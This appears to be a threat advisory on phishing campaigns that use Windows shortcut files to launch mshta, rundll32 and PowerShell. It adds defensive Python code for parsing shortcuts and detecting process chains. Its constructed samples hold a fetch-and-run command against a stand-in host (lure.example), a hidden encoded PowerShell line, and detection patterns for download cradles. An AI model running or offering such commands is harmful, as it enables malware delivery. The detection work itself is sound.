Threat actors are increasingly using malicious Windows Shortcut files (.LNK) bundled inside archive containers (.ZIP, .ISO) to get past conventional security controls such as email gateway filters and basic antivirus software. These LNK files invoke Living Off The Land Binaries (LOLBins), legitimate signed Windows programs, to covertly download and run malicious software. The method exploits the trust placed in core Windows components, which makes the initial infection hard to identify. Technical and user-focused mitigations should be implemented without delay. The campaign is a serious threat to consumer and enterprise systems alike, particularly those on which the user runs with elevated privileges.
A recent campaign uses malicious .LNK shortcut files to abuse trusted Windows binaries (e.g., mshta.exe, rundll32.exe) to fetch and execute malware while evading traditional detections. Delivered via spear-phishing and compromised sites, the multi-stage chain runs its payloads largely in memory and establishes persistence through a registry Run key. The technical details of the threat are broken down as follows:
Delivery and Infection Chain:
The threat is delivered primarily through well-crafted social engineering. Threat actors send phishing emails carrying malicious Windows Shortcut files (.LNK) inside compressed archives, typically .ZIP, or larger container formats such as .ISO or .IMG. Packaging the shortcut this way is designed to get past typical email gateway controls, which block common executable attachments but often pass archives and disk images. The infection chain begins when the user opens the archive and double-clicks the fraudulent LNK file, lured by a plausible file name (for example, "Invoice" or "Shipping Update"). That action runs the command embedded in the LNK file, launching the next stage of the attack.
Threat Exploitation Process:
The attack abuses system trust to covertly carry out its payload. The command embedded in the LNK file launches a legitimate, signed Windows binary such as mshta.exe or rundll32.exe, which fetches the next stage from an attacker-controlled server and hands it to a further LOLBin such as powershell.exe (LNK → mshta → powershell). Because every stage is hosted by a trusted Windows process and the payload runs largely in memory, little or nothing is written to disk for file-based antivirus to inspect. The payload then establishes persistence through a registry Run key.
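The delivery and exploitation steps above can be checked at the email gateway or in a sandbox by looking inside the archive instead of trusting file extensions. The following Python is an added example, not code from the original article or from any vendor: it parses the Shell Link (MS-SHLLINK) binary format to recover a shortcut's target and command-line arguments, flags LOLBin targets, remote payload URLs, script or DLL payloads and double extensions, and identifies ZIP members as shortcuts by their header signature rather than their name. The sample ZIP, the shortcuts inside it and the host name lure.example are constructed for the demonstration, and the LOLBin watch-list and heuristics are assumptions.

```python
"""Triage Windows shortcuts inside an archive: parse the Shell Link (MS-SHLLINK)
binary format, recover target and arguments, and flag LOLBin abuse.
Added example; the ZIP, the shortcuts in it and the host lure.example are constructed."""
import io
import re
import struct
import zipfile

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# LinkFlags bits (MS-SHLLINK 2.1.1); StringData fields appear in this order when present
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
                 ("arguments", 0x20), ("icon_location", 0x40)]
LOLBINS = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe",
           "powershell.exe", "certutil.exe", "cmd.exe", "bitsadmin.exe"}  # assumed watch-list


def is_lnk(data: bytes) -> bool:
    """Identify by header (HeaderSize 0x4C + LinkCLSID), not by file extension."""
    return len(data) >= 76 and data[:4] == b"\x4c\x00\x00\x00" and data[4:20] == LNK_CLSID


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields; IDList and LinkInfo are skipped using their own sizes."""
    if not is_lnk(data):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_IDLIST:      # LinkTargetIDList: 2-byte IDListSize then the IDList itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:    # LinkInfo: first dword is its total size
        pos += struct.unpack_from("<I", data, pos)[0]
    link = {"flags": flags}
    for field, bit in STRING_FIELDS:   # each: CountCharacters then the chars, no terminator
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + width * count]
        link[field] = raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252", "replace")
        pos += width * count
    return link


def triage(link: dict) -> list:
    """Heuristics: LOLBin target, remote (URL/UNC) payload, script or DLL payload."""
    cmd = (link.get("relative_path", "") + " " + link.get("arguments", "")).lower()
    findings = []
    hits = sorted(b for b in LOLBINS if b in cmd)
    if hits:
        findings.append("lolbin:" + ",".join(hits))
    if re.search(r"https?://|\\\\[a-z0-9.-]+\\", cmd):
        findings.append("remote-payload")
    if re.search(r"\.(hta|js|vbs|ps1|dll)\b", cmd):
        findings.append("script-or-dll-payload")
    return findings


def scan_archive(zip_bytes: bytes) -> dict:
    """Map each member that really is a shortcut to its findings; other members are skipped."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            data = zf.read(info)
            if not is_lnk(data):
                continue
            findings = triage(parse_lnk(data))
            if re.search(r"\.(pdf|docx?|xlsx?|txt)\.lnk$", info.filename, re.I):
                findings.append("double-extension")   # "Invoice.pdf.lnk" style lure
            results[info.filename] = findings
    return results


def build_lnk(relative_path: str, arguments: str = "", name: str = "") -> bytes:
    """Constructed minimal shortcut for testing (not a real sample). It carries a dummy
    one-item IDList and a minimal 28-byte LinkInfo so the parser has to skip both."""
    fields = {"name": name, "relative_path": relative_path, "arguments": arguments}
    flags = HAS_IDLIST | HAS_LINKINFO | IS_UNICODE
    for field, bit in STRING_FIELDS:
        if fields.get(field):
            flags |= bit
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags).ljust(76, b"\x00")
    idlist = struct.pack("<H", 6) + b"\x04\x00\x1f\x50" + b"\x00\x00"   # one ItemID + TerminalID
    linkinfo = struct.pack("<III", 28, 28, 0) + b"\x00" * 16           # size, header size, flags, offsets
    strings = b"".join(struct.pack("<H", len(fields[f])) + fields[f].encode("utf-16-le")
                       for f, bit in STRING_FIELDS if flags & bit)
    return header + idlist + linkinfo + strings


def build_sample_zip() -> bytes:
    """Constructed lure archive: one malicious shortcut, one benign one, one text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_2024.pdf.lnk", build_lnk(r"..\..\..\Windows\System32\mshta.exe",
                                                      "http://lure.example/invoice.hta", name="Invoice"))
        zf.writestr("Readme.lnk", build_lnk(r"..\..\..\Windows\System32\notepad.exe"))
        zf.writestr("notes.txt", b"plain text, not a shortcut")
    return buf.getvalue()


if __name__ == "__main__":
    for member, findings in scan_archive(build_sample_zip()).items():
        print(member, "->", findings or "clean")
```

The parser deliberately stops after the StringData block; the ExtraData section that follows can hold an EnvironmentVariableDataBlock with an alternative target, so a production scanner should read that too. The header check matters because gateways that only match on the `.lnk` extension miss shortcuts renamed inside ISO/IMG containers.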
Technical Capabilities:
The technical capabilities of this attack vector focus on maximizing impact, stealth, and persistence. By evading perimeter defenses, the LNK/LOLBin combination gives the attacker a high probability of successful initial access. Once on the system, the final payload, which may be a loader, a Remote Access Trojan (RAT), or an advanced InfoStealer, establishes durable persistence by modifying registry Run keys or creating scheduled tasks. That foothold provides extended access for data exfiltration, including the collection of proprietary files, system information, and browser credentials, and it is the prerequisite for lateral movement and high-impact follow-on attacks such as enterprise-wide ransomware.
Attribution and Evolution:
Because the technique is shared by many advanced eCrime (cybercriminal) groups and specific malware families, such as Qakbot, IcedID, DarkGate, and various InfoStealers, attribution for LNK/LOLBin attacks is broad; nation-state actors have also been observed adopting it. To make identification and analysis harder, actors continue to evolve the technique by adding layers of obfuscation, moving from plain ZIP files to more elaborate containers such as ISOs, and chaining several LOLBins together (e.g., LNK → mshta → powershell).
Active Campaign and Geographic Spread:
LNK-based phishing is active, global, and high volume, targeting enterprises across many sectors. While the threat is worldwide, high-value targets in North America and Europe are hit continuously, with a growing focus on critical infrastructure and financial sectors in APAC and MENA.
Conclusion:
Combining the user-trusted LNK format with a system-trusted LOLBin execution chain produces an extremely effective and inexpensive attack vector. Traditional antivirus software and unsophisticated behavioral rules struggle to detect this LNK-based campaign because it relies on trusted Windows binaries and in-memory execution for stealthy initial access and persistence. Organizations should treat LNK attachments and unexpected mshta/rundll32 process chains as high-risk. Mitigation must concentrate on aggressively blocking archives that contain LNK files at the email gateway and on behavioral detection of suspicious process chains. User awareness remains the most important last line of defense.
A successful LNK/LOLBin attack has a severe impact and typically leads to the most destructive forms of cybercrime. The initial breach escalates quickly from information theft (PII, passwords, proprietary data) to catastrophic incidents. Because this technique is a favored entry point for groups such as IcedID and Qakbot, the immediate risk is ransomware deployment, resulting in network-wide encryption and the associated costs of business disruption, incident response, and reputational damage. The cost of resolving these complex attacks is consistently substantial, especially for firms that suffer successive multi-stage ransomware incidents.
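For the behavioral detection of suspicious process chains called for in the conclusion, and for the Run-key persistence described under Technical Capabilities, here is an added example in Python that is not part of the original article: it rebuilds process ancestry from Sysmon-style process creation (Event ID 1) and registry value set (Event ID 13) records and raises alerts for a LOLBin launched from explorer.exe with download or encoded-command arguments, for two or more LOLBins in one ancestry (the LNK → mshta → powershell chain), and for a Run key written by a process descended from such a chain. The event records, GUIDs, SID, paths and command lines are constructed for the demonstration; the field names follow Sysmon's, while the LOLBin list and the rule thresholds are assumptions.

```python
"""Behavioral detection of explorer -> LOLBin -> LOLBin process chains and Run-key
persistence over Sysmon-style events. Added example; every event here is constructed."""
import re

LOLBINS = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe",
           "powershell.exe", "certutil.exe", "bitsadmin.exe", "msiexec.exe"}  # assumed watch-list
SUSPICIOUS_ARGS = re.compile(
    r"https?://|-enc(odedcommand)?\b|\biex\b|downloadstring|frombase64string|javascript:|\.hta\b", re.I)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(procs: dict, guid: str, limit: int = 16) -> list:
    """Follow ParentProcessGuid links; returns image names root-first (bounded against loops)."""
    chain = []
    while guid in procs and len(chain) < limit:
        chain.append(image_name(procs[guid]["Image"]))
        guid = procs[guid].get("ParentProcessGuid")
    return chain[::-1]


def detect(events: list) -> list:
    """Run the three rules over the event stream and return alerts in event order."""
    procs = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    alerts = []
    for e in events:
        chain = ancestry(procs, e["ProcessGuid"])
        lolbins = [p for p in chain if p in LOLBINS]
        if e["EventID"] == 1:
            if len(lolbins) >= 2:
                # Rule 1: one LOLBin spawning another (mshta -> powershell) is rare in normal use
                alerts.append({"rule": "lolbin-chain", "chain": chain, "guid": e["ProcessGuid"]})
            elif lolbins and "explorer.exe" in chain and SUSPICIOUS_ARGS.search(e.get("CommandLine", "")):
                # Rule 2: a single LOLBin under explorer.exe is common (a double-clicked shortcut),
                # so it is flagged only when the arguments carry download/script/encoded indicators
                alerts.append({"rule": "lolbin-from-explorer", "chain": chain, "guid": e["ProcessGuid"]})
        elif e["EventID"] == 13 and lolbins and RUN_KEY.search(e["TargetObject"]):
            # Rule 3: Run-key value written by a process that descends from a LOLBin
            alerts.append({"rule": "run-key-persistence", "chain": chain, "guid": e["ProcessGuid"],
                           "value": e["TargetObject"], "data": e.get("Details", "")})
    return alerts


def sample_events() -> list:
    """Constructed Sysmon-style records (GUIDs, SID, paths and the lure URL are made up)."""
    sid = r"HKU\S-1-5-21-1-2-3-1001"
    return [
        {"EventID": 1, "ProcessGuid": "E1", "ParentProcessGuid": None,
         "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
        {"EventID": 1, "ProcessGuid": "M1", "ParentProcessGuid": "E1",
         "Image": r"C:\Windows\System32\mshta.exe",
         "CommandLine": "mshta.exe http://lure.example/invoice.hta"},
        {"EventID": 1, "ProcessGuid": "P1", "ParentProcessGuid": "M1",
         "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "CommandLine": "powershell.exe -nop -w hidden -enc AAAA"},
        {"EventID": 13, "ProcessGuid": "P1",
         "TargetObject": sid + r"\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
         "Details": r"C:\Users\user\AppData\Roaming\upd.lnk"},
        # benign noise: a Control Panel applet via rundll32, and explorer itself touching Run
        {"EventID": 1, "ProcessGuid": "R1", "ParentProcessGuid": "E1",
         "Image": r"C:\Windows\System32\rundll32.exe",
         "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
        {"EventID": 13, "ProcessGuid": "E1",
         "TargetObject": sid + r"\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
         "Details": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe"},
    ]


if __name__ == "__main__":
    for alert in detect(sample_events()):
        print(alert["rule"], "->", " > ".join(alert["chain"]))
```

The benign rundll32 and explorer records are there on purpose: a lone LOLBin under explorer.exe and a Run-key write by explorer.exe both stay silent, which is what keeps a rule like this usable on a real fleet. Ancestry is rebuilt from the GUID links in the events themselves, so the logic works on exported logs as well as live telemetry.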
https://securityonline.info/new-lnk-malware-uses-windows-lolbins-to-evade-detection/